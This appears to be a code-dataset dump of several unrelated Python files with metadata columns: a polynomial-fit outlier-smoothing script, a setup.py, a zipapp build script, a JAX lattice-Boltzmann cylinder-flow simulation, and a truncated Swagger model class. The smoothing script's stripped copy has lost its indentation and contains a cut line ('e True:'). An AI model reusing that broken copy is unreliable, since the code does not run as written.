    p1 = np.poly1d(z1)
    yvals = p1(x)
    p2 = abs(yvals - y_new)
    sigma1 = np.std(p2)
    print(sigma1)
    if(sigma==sigma1):
        break   # converged: residual spread unchanged
    else:
        sigma=sigma1
print(y_new)
# Final fit on the de-noised series and comparison plot.
z_new = np.polyfit(x, y_new, 2)
p_new = np.poly1d(z_new)
yvals_new = p_new(x)
ybar_new = np.sum(y_new) / len(y)
ssreg = np.sum((yvals_new - ybar_new) ** 2)
sstot = np.sum((y_new - ybar_new) ** 2)
sstot_old = np.sum((y - ybar) ** 2) # total sum of squares of the *raw* data
print (ssreg / sstot_old) # goodness of fit measured against the raw variance
plot_new1 = plt.plot(x, y_new, '*', label='original values')
plot_new12 = plt.plot(x, yvals_new, 'r', label='polyfit values')
plt.xlabel('year(05-15)')
plt.ylabel('Proportion')
plt.legend(loc=4) # legend in the lower-right corner
plt.title('topic10')
plt.show()
plt.savefig('p1.png')  # NOTE(review): again after show(); also overwrites the first save
print(p_new)
# (A symbolic derivative of the fitted polynomial via sympy was sketched
# here; use: x = Symbol("x"); print(diff(p_new, x)))
# print(diff(p_new, x)) | 25.061798 | 165 | 0.576328 |
from __future__ import print_function
from __future__ import print_function
from __future__ import print_function
import matplotlib.pyplot as plt
import numpy as np
import pickle
import pprint
import matplotlib.pyplot as plt
import numpy as np
import pymysql
import pickle
from sympy import *
pkl_file = open('../领域预测/topiclist/list22.pkl', 'rb')
list1 = pickle.load(pkl_file)
newlist=[]
sumlist=0
i=0
h=0
j=1
while i<len(list1):
while h<j:
sumlist = sumlist+list1[i+h]
h=h+1
newlist.append(sumlist)
sumlist=0
h=0
i=i+j
print (len(newlist))
x = np.arange(1, len(newlist)+1, 1)
y = np.array(newlist)
z1 = np.polyfit(x, y, 2)
p1 = np.poly1d(z1)
yvals = p1(x)
p2 = abs(yvals - y)
sigma = np.std(p2)
print(sigma)
print(p2)
print ("p1:"),
print(p1)
yvals = p1(x)
ybar = np.sum(y) / len(y)
out = p2>sigma*3
print (out)
ssreg = np.sum((yvals - ybar) ** 2)
sstot = np.sum((y - ybar) ** 2)
print (ssreg / sstot)
plot1 = plt.plot(x, y, '*', label='original values')
plot2 = plt.plot(x, yvals, 'r', label='polyfit values')
plt.xlabel('year(05-15)')
plt.ylabel('Proportion')
plt.legend(loc=4)
plt.title('topic1')
plt.show()
plt.savefig('p1.png')
y_new = y.tolist()
yvals1 = yvals.tolist()
e True:
i = 0
while i < len(y):
if abs(y_new[i]-yvals1[i])>=sigma*3:
print (y_new[i])
if i!=0 and i!=len(y)-1:
y_new[i] = (y_new[i - 1] + y_new[i-2]) * 0.5
elif i==1:
y_new[i] = (y_new[0] + y_new[2]) * 0.5
i=i+1
z1 = np.polyfit(x, y_new, 2)
p1 = np.poly1d(z1)
yvals = p1(x)
p2 = abs(yvals - y_new)
sigma1 = np.std(p2)
print(sigma1)
if(sigma==sigma1):
break
else:
sigma=sigma1
print(y_new)
z_new = np.polyfit(x, y_new, 2)
p_new = np.poly1d(z_new)
yvals_new = p_new(x)
ybar_new = np.sum(y_new) / len(y)
ssreg = np.sum((yvals_new - ybar_new) ** 2)
sstot = np.sum((y_new - ybar_new) ** 2)
sstot_old = np.sum((y - ybar) ** 2)
print (ssreg / sstot_old)
plot_new1 = plt.plot(x, y_new, '*', label='original values')
plot_new12 = plt.plot(x, yvals_new, 'r', label='polyfit values')
plt.xlabel('year(05-15)')
plt.ylabel('Proportion')
plt.legend(loc=4)
plt.title('topic10')
plt.show()
plt.savefig('p1.png')
print(p_new)
| true | true |
f7234ae3e592912852a4bba4f2ff0826aa6d22b8 | 2,183 | py | Python | setup.py | exemplarysoftware/thecut-forms | 6c376a382862ebe05e843c1c4c934c98089b0ea2 | [
"Apache-2.0"
] | null | null | null | setup.py | exemplarysoftware/thecut-forms | 6c376a382862ebe05e843c1c4c934c98089b0ea2 | [
"Apache-2.0"
] | null | null | null | setup.py | exemplarysoftware/thecut-forms | 6c376a382862ebe05e843c1c4c934c98089b0ea2 | [
"Apache-2.0"
] | null | null | null | from __future__ import print_function
import codecs
import io
import os
from thecut.forms import __version__
from setuptools import setup, find_packages
import sys
here = os.path.abspath(os.path.dirname(__file__))
def read(*filenames, **kwargs):
    """Read one or more files relative to this directory and join their contents.

    Keyword arguments: ``encoding`` (default ``'utf-8'``) and ``sep``
    (default newline), the separator placed between the file contents.
    """
    encoding = kwargs.get('encoding', 'utf-8')
    separator = kwargs.get('sep', '\n')
    contents = []
    for name in filenames:
        path = os.path.join(here, name)
        with io.open(path, encoding=encoding) as handle:
            contents.append(handle.read())
    return separator.join(contents)
# Concatenate the README and changelog into the long PyPI description.
long_description = read('README.rst', 'HISTORY.rst')
setup(
    # General information
    name='thecut-forms',
    version=__version__,
    # Packaging
    packages=find_packages(exclude=['docs']),
    namespace_packages=['thecut'],
    include_package_data=True,
    # Dependencies (none declared beyond the standard library)
    install_requires=[],
    # Author information
    author='The Cut Creative',
    author_email='development@thecut.net.au',
    # Additional information
    url='https://github.com/thecut/thecut-forms',
    license='Apache Software License 2.0',
    description='A reusable application.',
    long_description=long_description,
    platforms='any',
    # Trove classifiers: https://pypi.org/classifiers/
    classifiers=[
        'Programming Language :: Python',
        'Programming Language :: Python :: 2',
        'Programming Language :: Python :: 2.7',
        'Programming Language :: Python :: 3',
        'Programming Language :: Python :: 3.4',
        'Programming Language :: Python :: 3.5',
        'Programming Language :: Python :: 3.6',
        'Development Status :: 5 - Production/Stable',
        'Natural Language :: English',
        'Environment :: Web Environment',
        'Intended Audience :: Developers',
        'License :: OSI Approved :: Apache Software License',
        'Operating System :: OS Independent',
        'Topic :: Software Development :: Libraries :: Python Modules',
        'Topic :: Software Development :: Libraries :: Application Frameworks',
        'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
        'Framework :: Django',
        'Framework :: Django :: 1.8',
        'Framework :: Django :: 1.10',
        'Framework :: Django :: 1.11',
    ],
)
| 30.746479 | 79 | 0.633532 | from __future__ import print_function
import codecs
import io
import os
from thecut.forms import __version__
from setuptools import setup, find_packages
import sys
here = os.path.abspath(os.path.dirname(__file__))
def read(*filenames, **kwargs):
encoding = kwargs.get('encoding', 'utf-8')
sep = kwargs.get('sep', '\n')
buf = []
for filename in filenames:
filename = os.path.join(here, filename)
with io.open(filename, encoding=encoding) as f:
buf.append(f.read())
return sep.join(buf)
long_description = read('README.rst', 'HISTORY.rst')
setup(
name='thecut-forms',
version=__version__,
packages=find_packages(exclude=['docs']),
namespace_packages=['thecut'],
include_package_data=True,
install_requires=[],
author='The Cut Creative',
author_email='development@thecut.net.au',
url='https://github.com/thecut/thecut-forms',
license='Apache Software License 2.0',
description='A reusable application.',
long_description=long_description,
platforms='any',
classifiers=[
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Development Status :: 5 - Production/Stable',
'Natural Language :: English',
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: Apache Software License',
'Operating System :: OS Independent',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Software Development :: Libraries :: Application Frameworks',
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
'Framework :: Django',
'Framework :: Django :: 1.8',
'Framework :: Django :: 1.10',
'Framework :: Django :: 1.11',
],
)
| true | true |
f7234ba476f63fb75a3db59019e0e59af746bdf4 | 202 | py | Python | build.py | AliceAndTheBuilders/es-tenso | 7f0a24fbe4774919e849087d3bbbde6174928e1a | [
"MIT"
] | 3 | 2017-03-17T09:40:42.000Z | 2017-04-12T16:21:39.000Z | build.py | misleem/es-tenso | 799a58f765efdf2a57348129c9a0a44879dc63bb | [
"MIT"
] | 4 | 2017-03-06T19:17:13.000Z | 2017-03-22T09:59:53.000Z | build.py | misleem/es-tenso | 799a58f765efdf2a57348129c9a0a44879dc63bb | [
"MIT"
] | 2 | 2017-05-10T12:50:12.000Z | 2018-05-30T10:54:29.000Z | import zipapp
from tenso.version import __version__
target_name = "dist/tenso-" + str(__version__) + ".pyz"
print("Building: " + target_name)
zipapp.create_archive(target=target_name, source="tenso")
| 25.25 | 57 | 0.762376 | import zipapp
from tenso.version import __version__
target_name = "dist/tenso-" + str(__version__) + ".pyz"
print("Building: " + target_name)
zipapp.create_archive(target=target_name, source="tenso")
| true | true |
f7234c0e2482adef9bfa3a12c21d0f016557b1f6 | 13,122 | py | Python | lattice_boltzmann_method_python_jax.py | Ceyron/Lattice-Boltzmann-Method-JAX | f18e136e6e12fa575104053818c53b1689e50948 | [
"MIT"
] | null | null | null | lattice_boltzmann_method_python_jax.py | Ceyron/Lattice-Boltzmann-Method-JAX | f18e136e6e12fa575104053818c53b1689e50948 | [
"MIT"
] | null | null | null | lattice_boltzmann_method_python_jax.py | Ceyron/Lattice-Boltzmann-Method-JAX | f18e136e6e12fa575104053818c53b1689e50948 | [
"MIT"
] | null | null | null | r"""
Solves the incompressible Navier Stokes equations using the Lattice-Boltzmann
Method¹. The scenario is the flow around a cylinder in 2D which yields a van
Karman vortex street.
periodic
+-------------------------------------------------------------+
| |
| ---> |
| |
| ---> **** |
| ******** |
inflow | ---> ********** | outflow
| ******** |
| ---> **** |
| |
| ---> |
| |
+-------------------------------------------------------------+
periodic
-> uniform inflow profile with only horizontal velocities at left boundary
-> outflow boundary at the right
-> top and bottom boundary connected by periodicity
-> the circle in the center (representing a slice from the 3d cylinder)
uses a no-slip Boundary Condition
-> initially, fluid is NOT at rest and has the horizontal velocity profile
all over the domain
¹ To be fully correct, LBM considers the compressible Navier-Stokes Equations.
This can also be seen by the fact that we have a changing macroscopic density over
the domain and that we actively use it throughout the computations. However, our
flow speeds are below the 0.3 Mach limit which results in only minor density
fluctuations. Hence, the fluid behaves almost incompressible.
------
Solution strategy:
Discretize the domain into a Cartesian mesh. Each grid vertex is associated
with 9 discrete velocities (D2Q9) and 2 macroscopic velocities. Then iterate
over time.
1. Apply outflow boundary condition on the right boundary
2. Compute Macroscopic Quantities (density and velocities)
3. Apply Inflow Profile by Zou/He Dirichlet Boundary Condition
on the left boundary
4. Compute the discrete equilibria velocities
5. Perform a Collision step according to BGK (Bhatnagar–Gross–Krook)
6. Apply Bounce-Back Boundary Conditions on the cylinder obstacle
7. Stream alongside the lattice velocities
8. Advance in time (repeat the loop)
The 7th step implicitly yields the periodic Boundary Conditions at
the top and bottom boundary.
------
Employed Discretization:
D2Q9 grid, i.e. 2-dim space with 9 discrete
velocities per node. In Other words the 2d space is discretized into
N_x by N_y by 9 points.
6 2 5
\ | /
3 - 0 - 1
/ | \
7 4 8
Therefore we have the shapes:
- macroscopic velocity : (N_x, N_y, 2)
- discrete velocity : (N_x, N_y, 9)
- density : (N_x, N_y)
------
Lattice Boltzmann Computations
Density:
ρ = ∑ᵢ fᵢ
Velocities:
u = 1/ρ ∑ᵢ fᵢ cᵢ
Equilibrium:
fᵢᵉ = ρ Wᵢ (1 + 3 cᵢ ⋅ u + 9/2 (cᵢ ⋅ u)² − 3/2 ||u||₂²)
BGK Collision:
fᵢ ← fᵢ − ω (fᵢ − fᵢᵉ)
with the following quantities:
fᵢ : Discrete velocities
fᵢᵉ : Equilibrium discrete velocities
ρ : Density
∑ᵢ : Summation over all discrete velocities
cᵢ : Lattice Velocities
Wᵢ : Lattice Weights
ω : Relaxation factor
------
The flow configuration is defined using the Reynolds Number
Re = (U R) / ν
with:
Re : Reynolds Number
U : Inflow Velocity
R : Cylinder Radius
ν : Kinematic Viscosity
Can be re-arranged in terms of the kinematic viscosity
ν = (U R) / Re
Then the relaxation factor is computed according to
ω = 1 / (3 ν + 0.5)
------
Note that this scheme can become unstable for Reynolds numbers >~ 350 ²
² Note that the stability of the D2Q9 scheme is mathematically not
   linked to the Reynolds number. Just use this as a reference. Stability
   for this scheme is related to the velocity magnitude.
   Consequently, the actual limiting factor is the Mach number (the
   ratio between velocity magnitude and the speed of sound).
"""
import jax
import jax.numpy as jnp
import matplotlib.pyplot as plt
import cmasher as cmr
from tqdm import tqdm
N_ITERATIONS = 15_000
REYNOLDS_NUMBER = 80
N_POINTS_X = 300
N_POINTS_Y = 50
CYLINDER_CENTER_INDEX_X = N_POINTS_X // 5
CYLINDER_CENTER_INDEX_Y = N_POINTS_Y // 2
CYLINDER_RADIUS_INDICES = N_POINTS_Y // 9
MAX_HORIZONTAL_INFLOW_VELOCITY = 0.04
VISUALIZE = True
PLOT_EVERY_N_STEPS = 100
SKIP_FIRST_N_ITERATIONS = 5000
r"""
LBM Grid: D2Q9
6 2 5
\ | /
3 - 0 - 1
/ | \
7 4 8
"""
N_DISCRETE_VELOCITIES = 9
LATTICE_VELOCITIES = jnp.array([
[ 0, 1, 0, -1, 0, 1, -1, -1, 1,],
[ 0, 0, 1, 0, -1, 1, 1, -1, -1,]
])
LATTICE_INDICES = jnp.array([
0, 1, 2, 3, 4, 5, 6, 7, 8,
])
OPPOSITE_LATTICE_INDICES = jnp.array([
0, 3, 4, 1, 2, 7, 8, 5, 6,
])
LATTICE_WEIGHTS = jnp.array([
4/9, # Center Velocity [0,]
1/9, 1/9, 1/9, 1/9, # Axis-Aligned Velocities [1, 2, 3, 4]
1/36, 1/36, 1/36, 1/36, # 45 ° Velocities [5, 6, 7, 8]
])
RIGHT_VELOCITIES = jnp.array([1, 5, 8])
UP_VELOCITIES = jnp.array([2, 5, 6])
LEFT_VELOCITIES = jnp.array([3, 6, 7])
DOWN_VELOCITIES = jnp.array([4, 7, 8])
PURE_VERTICAL_VELOCITIES = jnp.array([0, 2, 4])
PURE_HORIZONTAL_VELOCITIES = jnp.array([0, 1, 3])
def get_density(discrete_velocities):
    """Macroscopic density per node: rho = sum_i f_i over the 9 lattice directions.

    Input shape (N_x, N_y, 9); result shape (N_x, N_y).
    """
    return jnp.sum(discrete_velocities, axis=-1)
def get_macroscopic_velocities(discrete_velocities, density):
    """Macroscopic velocity u = (1/rho) * sum_i f_i c_i.

    Input shapes (N_x, N_y, 9) and (N_x, N_y); result shape (N_x, N_y, 2).
    """
    # First moment of the distributions along the lattice velocities.
    momentum = jnp.einsum(
        "NMQ,dQ->NMd",
        discrete_velocities,
        LATTICE_VELOCITIES,
    )
    return momentum / density[..., jnp.newaxis]
def get_equilibrium_discrete_velocities(macroscopic_velocities, density):
    """D2Q9 equilibrium distributions.

    f_i^eq = rho * W_i * (1 + 3 c_i.u + 9/2 (c_i.u)^2 - 3/2 ||u||^2),
    evaluated per grid node; result shape (N_x, N_y, 9).
    """
    # c_i . u for every lattice direction -> shape (N_x, N_y, 9)
    c_dot_u = jnp.einsum(
        "dQ,NMd->NMQ",
        LATTICE_VELOCITIES,
        macroscopic_velocities,
    )
    # ||u||_2 per grid node -> shape (N_x, N_y)
    u_magnitude = jnp.linalg.norm(
        macroscopic_velocities,
        axis=-1,
        ord=2,
    )
    polynomial = (
        1
        + 3 * c_dot_u
        + 9/2 * c_dot_u**2
        - 3/2 * u_magnitude[..., jnp.newaxis]**2
    )
    return (
        density[..., jnp.newaxis]
        * LATTICE_WEIGHTS[jnp.newaxis, jnp.newaxis, :]
        * polynomial
    )
def main():
    """Run the D2Q9 lattice-Boltzmann simulation of flow past a cylinder.

    Builds the mesh and obstacle mask, derives the BGK relaxation factor
    from the configured Reynolds number, then advances the jitted
    ``update`` kernel for ``N_ITERATIONS`` steps, periodically plotting
    velocity magnitude and vorticity when ``VISUALIZE`` is enabled.
    """
    # Double precision keeps the long explicit time integration accurate.
    jax.config.update("jax_enable_x64", True)
    # nu = (U R) / Re, all in lattice units.
    kinematic_viscosity = (
        (
            MAX_HORIZONTAL_INFLOW_VELOCITY
            *
            CYLINDER_RADIUS_INDICES
        ) / (
            REYNOLDS_NUMBER
        )
    )
    # BGK relaxation factor: omega = 1 / (3 nu + 0.5)
    relaxation_omega = (
        (
            1.0
        ) / (
            3.0
            *
            kinematic_viscosity
            +
            0.5
        )
    )
    # Define a mesh
    x = jnp.arange(N_POINTS_X)
    y = jnp.arange(N_POINTS_Y)
    X, Y = jnp.meshgrid(x, y, indexing="ij")
    # Obstacle Mask: An array of the shape like X or Y, but contains True if the
    # point belongs to the obstacle and False if not
    obstacle_mask = (
        jnp.sqrt(
            (
                X
                -
                CYLINDER_CENTER_INDEX_X
            )**2
            +
            (
                Y
                -
                CYLINDER_CENTER_INDEX_Y
            )**2
        )
        <
        CYLINDER_RADIUS_INDICES
    )
    # Initial condition: uniform horizontal inflow velocity everywhere.
    velocity_profile = jnp.zeros((N_POINTS_X, N_POINTS_Y, 2))
    velocity_profile = velocity_profile.at[:, :, 0].set(MAX_HORIZONTAL_INFLOW_VELOCITY)
    # One complete LBM time step (steps 1-7 of the module docstring).
    @jax.jit
    def update(discrete_velocities_prev):
        # (1) Prescribe the outflow BC on the right boundary
        discrete_velocities_prev = discrete_velocities_prev.at[-1, :, LEFT_VELOCITIES].set(
            discrete_velocities_prev[-2, :, LEFT_VELOCITIES]
        )
        # (2) Macroscopic Velocities
        density_prev = get_density(discrete_velocities_prev)
        macroscopic_velocities_prev = get_macroscopic_velocities(
            discrete_velocities_prev,
            density_prev,
        )
        # (3) Prescribe Inflow Dirichlet BC using Zou/He scheme
        macroscopic_velocities_prev =\
            macroscopic_velocities_prev.at[0, 1:-1, :].set(
                velocity_profile[0, 1:-1, :]
            )
        density_prev = density_prev.at[0, :].set(
            (
                get_density(discrete_velocities_prev[0, :, PURE_VERTICAL_VELOCITIES].T)
                +
                2 *
                get_density(discrete_velocities_prev[0, :, LEFT_VELOCITIES].T)
            ) / (
                1 - macroscopic_velocities_prev[0, :, 0]
            )
        )
        # (4) Compute discrete Equilibria velocities
        equilibrium_discrete_velocities = get_equilibrium_discrete_velocities(
            macroscopic_velocities_prev,
            density_prev,
        )
        # (3) Belongs to the Zou/He scheme
        discrete_velocities_prev = \
            discrete_velocities_prev.at[0, :, RIGHT_VELOCITIES].set(
                equilibrium_discrete_velocities[0, :, RIGHT_VELOCITIES]
            )
        # (5) Collide according to BGK
        discrete_velocities_post_collision = (
            discrete_velocities_prev
            -
            relaxation_omega
            *
            (
                discrete_velocities_prev
                -
                equilibrium_discrete_velocities
            )
        )
        # (6) Bounce-Back Boundary Conditions to enforce the no-slip
        for i in range(N_DISCRETE_VELOCITIES):
            discrete_velocities_post_collision =\
                discrete_velocities_post_collision.at[obstacle_mask, LATTICE_INDICES[i]].set(
                    discrete_velocities_prev[obstacle_mask, OPPOSITE_LATTICE_INDICES[i]]
                )
        # (7) Stream alongside lattice velocities
        discrete_velocities_streamed = discrete_velocities_post_collision
        for i in range(N_DISCRETE_VELOCITIES):
            discrete_velocities_streamed = discrete_velocities_streamed.at[:, :, i].set(
                jnp.roll(
                    jnp.roll(
                        discrete_velocities_post_collision[:, :, i],
                        LATTICE_VELOCITIES[0, i],
                        axis=0,
                    ),
                    LATTICE_VELOCITIES[1, i],
                    axis=1,
                )
            )
        return discrete_velocities_streamed
    # Start from the equilibrium of the inflow profile at unit density.
    discrete_velocities_prev = get_equilibrium_discrete_velocities(
        velocity_profile,
        jnp.ones((N_POINTS_X, N_POINTS_Y)),
    )
    plt.style.use("dark_background")
    plt.figure(figsize=(15, 6), dpi=100)
    # Time stepping; plotting is throttled and skips the initial transient.
    for iteration_index in tqdm(range(N_ITERATIONS)):
        discrete_velocities_next = update(discrete_velocities_prev)
        discrete_velocities_prev = discrete_velocities_next
        if iteration_index % PLOT_EVERY_N_STEPS == 0 and VISUALIZE and iteration_index > SKIP_FIRST_N_ITERATIONS:
            density = get_density(discrete_velocities_next)
            macroscopic_velocities = get_macroscopic_velocities(
                discrete_velocities_next,
                density,
            )
            velocity_magnitude = jnp.linalg.norm(
                macroscopic_velocities,
                axis=-1,
                ord=2,
            )
            d_u__d_x, d_u__d_y = jnp.gradient(macroscopic_velocities[..., 0])
            d_v__d_x, d_v__d_y = jnp.gradient(macroscopic_velocities[..., 1])
            curl = (d_u__d_y - d_v__d_x)
            # Velocity Magnitude Contour Plot in the top
            plt.subplot(211)
            plt.contourf(
                X,
                Y,
                velocity_magnitude,
                levels=50,
                cmap=cmr.amber,
            )
            plt.colorbar().set_label("Velocity Magnitude")
            plt.gca().add_patch(plt.Circle(
                (CYLINDER_CENTER_INDEX_X, CYLINDER_CENTER_INDEX_Y),
                CYLINDER_RADIUS_INDICES,
                color="darkgreen",
            ))
            # Vorticity Magnitude Contour Plot in the bottom
            plt.subplot(212)
            plt.contourf(
                X,
                Y,
                curl,
                levels=50,
                cmap=cmr.redshift,
                vmin=-0.02,
                vmax= 0.02,
            )
            plt.colorbar().set_label("Vorticity Magnitude")
            plt.gca().add_patch(plt.Circle(
                (CYLINDER_CENTER_INDEX_X, CYLINDER_CENTER_INDEX_Y),
                CYLINDER_RADIUS_INDICES,
                color="darkgreen",
            ))
            plt.draw()
            plt.pause(0.0001)
            plt.clf()
    if VISUALIZE:
        plt.show()
# Entry point: run the simulation only when executed as a script.
if __name__ == "__main__":
    main()
| 28.341253 | 113 | 0.561195 | import jax
import jax.numpy as jnp
import matplotlib.pyplot as plt
import cmasher as cmr
from tqdm import tqdm
N_ITERATIONS = 15_000
REYNOLDS_NUMBER = 80
N_POINTS_X = 300
N_POINTS_Y = 50
CYLINDER_CENTER_INDEX_X = N_POINTS_X // 5
CYLINDER_CENTER_INDEX_Y = N_POINTS_Y // 2
CYLINDER_RADIUS_INDICES = N_POINTS_Y // 9
MAX_HORIZONTAL_INFLOW_VELOCITY = 0.04
VISUALIZE = True
PLOT_EVERY_N_STEPS = 100
SKIP_FIRST_N_ITERATIONS = 5000
N_DISCRETE_VELOCITIES = 9
LATTICE_VELOCITIES = jnp.array([
[ 0, 1, 0, -1, 0, 1, -1, -1, 1,],
[ 0, 0, 1, 0, -1, 1, 1, -1, -1,]
])
LATTICE_INDICES = jnp.array([
0, 1, 2, 3, 4, 5, 6, 7, 8,
])
OPPOSITE_LATTICE_INDICES = jnp.array([
0, 3, 4, 1, 2, 7, 8, 5, 6,
])
LATTICE_WEIGHTS = jnp.array([
4/9,
1/9, 1/9, 1/9, 1/9,
1/36, 1/36, 1/36, 1/36,
])
RIGHT_VELOCITIES = jnp.array([1, 5, 8])
UP_VELOCITIES = jnp.array([2, 5, 6])
LEFT_VELOCITIES = jnp.array([3, 6, 7])
DOWN_VELOCITIES = jnp.array([4, 7, 8])
PURE_VERTICAL_VELOCITIES = jnp.array([0, 2, 4])
PURE_HORIZONTAL_VELOCITIES = jnp.array([0, 1, 3])
def get_density(discrete_velocities):
density = jnp.sum(discrete_velocities, axis=-1)
return density
def get_macroscopic_velocities(discrete_velocities, density):
macroscopic_velocities = jnp.einsum(
"NMQ,dQ->NMd",
discrete_velocities,
LATTICE_VELOCITIES,
) / density[..., jnp.newaxis]
return macroscopic_velocities
def get_equilibrium_discrete_velocities(macroscopic_velocities, density):
projected_discrete_velocities = jnp.einsum(
"dQ,NMd->NMQ",
LATTICE_VELOCITIES,
macroscopic_velocities,
)
macroscopic_velocity_magnitude = jnp.linalg.norm(
macroscopic_velocities,
axis=-1,
ord=2,
)
equilibrium_discrete_velocities = (
density[..., jnp.newaxis]
*
LATTICE_WEIGHTS[jnp.newaxis, jnp.newaxis, :]
*
(
1
+
3 * projected_discrete_velocities
+
9/2 * projected_discrete_velocities**2
-
3/2 * macroscopic_velocity_magnitude[..., jnp.newaxis]**2
)
)
return equilibrium_discrete_velocities
def main():
jax.config.update("jax_enable_x64", True)
kinematic_viscosity = (
(
MAX_HORIZONTAL_INFLOW_VELOCITY
*
CYLINDER_RADIUS_INDICES
) / (
REYNOLDS_NUMBER
)
)
relaxation_omega = (
(
1.0
) / (
3.0
*
kinematic_viscosity
+
0.5
)
)
x = jnp.arange(N_POINTS_X)
y = jnp.arange(N_POINTS_Y)
X, Y = jnp.meshgrid(x, y, indexing="ij")
obstacle_mask = (
jnp.sqrt(
(
X
-
CYLINDER_CENTER_INDEX_X
)**2
+
(
Y
-
CYLINDER_CENTER_INDEX_Y
)**2
)
<
CYLINDER_RADIUS_INDICES
)
velocity_profile = jnp.zeros((N_POINTS_X, N_POINTS_Y, 2))
velocity_profile = velocity_profile.at[:, :, 0].set(MAX_HORIZONTAL_INFLOW_VELOCITY)
@jax.jit
def update(discrete_velocities_prev):
discrete_velocities_prev = discrete_velocities_prev.at[-1, :, LEFT_VELOCITIES].set(
discrete_velocities_prev[-2, :, LEFT_VELOCITIES]
)
density_prev = get_density(discrete_velocities_prev)
macroscopic_velocities_prev = get_macroscopic_velocities(
discrete_velocities_prev,
density_prev,
)
macroscopic_velocities_prev =\
macroscopic_velocities_prev.at[0, 1:-1, :].set(
velocity_profile[0, 1:-1, :]
)
density_prev = density_prev.at[0, :].set(
(
get_density(discrete_velocities_prev[0, :, PURE_VERTICAL_VELOCITIES].T)
+
2 *
get_density(discrete_velocities_prev[0, :, LEFT_VELOCITIES].T)
) / (
1 - macroscopic_velocities_prev[0, :, 0]
)
)
equilibrium_discrete_velocities = get_equilibrium_discrete_velocities(
macroscopic_velocities_prev,
density_prev,
)
discrete_velocities_prev = \
discrete_velocities_prev.at[0, :, RIGHT_VELOCITIES].set(
equilibrium_discrete_velocities[0, :, RIGHT_VELOCITIES]
)
discrete_velocities_post_collision = (
discrete_velocities_prev
-
relaxation_omega
*
(
discrete_velocities_prev
-
equilibrium_discrete_velocities
)
)
for i in range(N_DISCRETE_VELOCITIES):
discrete_velocities_post_collision =\
discrete_velocities_post_collision.at[obstacle_mask, LATTICE_INDICES[i]].set(
discrete_velocities_prev[obstacle_mask, OPPOSITE_LATTICE_INDICES[i]]
)
discrete_velocities_streamed = discrete_velocities_post_collision
for i in range(N_DISCRETE_VELOCITIES):
discrete_velocities_streamed = discrete_velocities_streamed.at[:, :, i].set(
jnp.roll(
jnp.roll(
discrete_velocities_post_collision[:, :, i],
LATTICE_VELOCITIES[0, i],
axis=0,
),
LATTICE_VELOCITIES[1, i],
axis=1,
)
)
return discrete_velocities_streamed
discrete_velocities_prev = get_equilibrium_discrete_velocities(
velocity_profile,
jnp.ones((N_POINTS_X, N_POINTS_Y)),
)
plt.style.use("dark_background")
plt.figure(figsize=(15, 6), dpi=100)
for iteration_index in tqdm(range(N_ITERATIONS)):
discrete_velocities_next = update(discrete_velocities_prev)
discrete_velocities_prev = discrete_velocities_next
if iteration_index % PLOT_EVERY_N_STEPS == 0 and VISUALIZE and iteration_index > SKIP_FIRST_N_ITERATIONS:
density = get_density(discrete_velocities_next)
macroscopic_velocities = get_macroscopic_velocities(
discrete_velocities_next,
density,
)
velocity_magnitude = jnp.linalg.norm(
macroscopic_velocities,
axis=-1,
ord=2,
)
d_u__d_x, d_u__d_y = jnp.gradient(macroscopic_velocities[..., 0])
d_v__d_x, d_v__d_y = jnp.gradient(macroscopic_velocities[..., 1])
curl = (d_u__d_y - d_v__d_x)
plt.subplot(211)
plt.contourf(
X,
Y,
velocity_magnitude,
levels=50,
cmap=cmr.amber,
)
plt.colorbar().set_label("Velocity Magnitude")
plt.gca().add_patch(plt.Circle(
(CYLINDER_CENTER_INDEX_X, CYLINDER_CENTER_INDEX_Y),
CYLINDER_RADIUS_INDICES,
color="darkgreen",
))
plt.subplot(212)
plt.contourf(
X,
Y,
curl,
levels=50,
cmap=cmr.redshift,
vmin=-0.02,
vmax= 0.02,
)
plt.colorbar().set_label("Vorticity Magnitude")
plt.gca().add_patch(plt.Circle(
(CYLINDER_CENTER_INDEX_X, CYLINDER_CENTER_INDEX_Y),
CYLINDER_RADIUS_INDICES,
color="darkgreen",
))
plt.draw()
plt.pause(0.0001)
plt.clf()
if VISUALIZE:
plt.show()
if __name__ == "__main__":
main()
| true | true |
f7234c418b6f763bd052bb739df4ad8099e6768f | 2,721 | py | Python | samples/server/petstore/flaskConnexion/swagger_server/models/api_response.py | Cadcorp/swagger-codegen | 23b64dd5e5266a7d0d7fb7a5c800d618c12696de | [
"Apache-2.0"
] | 1 | 2020-09-06T18:36:28.000Z | 2020-09-06T18:36:28.000Z | samples/server/petstore/flaskConnexion/swagger_server/models/api_response.py | Cadcorp/swagger-codegen | 23b64dd5e5266a7d0d7fb7a5c800d618c12696de | [
"Apache-2.0"
] | 1 | 2022-03-31T18:34:51.000Z | 2022-03-31T18:34:51.000Z | samples/server/petstore/flaskConnexion/swagger_server/models/api_response.py | Cadcorp/swagger-codegen | 23b64dd5e5266a7d0d7fb7a5c800d618c12696de | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
from __future__ import absolute_import
from datetime import date, datetime # noqa: F401
from typing import List, Dict # noqa: F401
from swagger_server.models.base_model_ import Model
from swagger_server import util
class ApiResponse(Model):
    """NOTE: This class is auto generated by the swagger code generator program.
    Do not edit the class manually.
    """
    def __init__(self, code: int=None, type: str=None, message: str=None):  # noqa: E501
        """ApiResponse - a model defined in Swagger
        :param code: The code of this ApiResponse.  # noqa: E501
        :type code: int
        :param type: The type of this ApiResponse.  # noqa: E501
        :type type: str
        :param message: The message of this ApiResponse.  # noqa: E501
        :type message: str
        """
        # Attribute name -> Python type, consumed by the Swagger (de)serializer.
        self.swagger_types = {
            'code': int,
            'type': str,
            'message': str
        }
        # Attribute name -> JSON key used on the wire.
        self.attribute_map = {
            'code': 'code',
            'type': 'type',
            'message': 'message'
        }
        self._code = code
        self._type = type
        self._message = message
    @classmethod
    def from_dict(cls, dikt) -> 'ApiResponse':
        """Returns the dict as a model
        :param dikt: A dict.
        :type: dict
        :return: The ApiResponse of this ApiResponse.  # noqa: E501
        :rtype: ApiResponse
        """
        return util.deserialize_model(dikt, cls)
    @property
    def code(self) -> int:
        """Gets the code of this ApiResponse.
        :return: The code of this ApiResponse.
        :rtype: int
        """
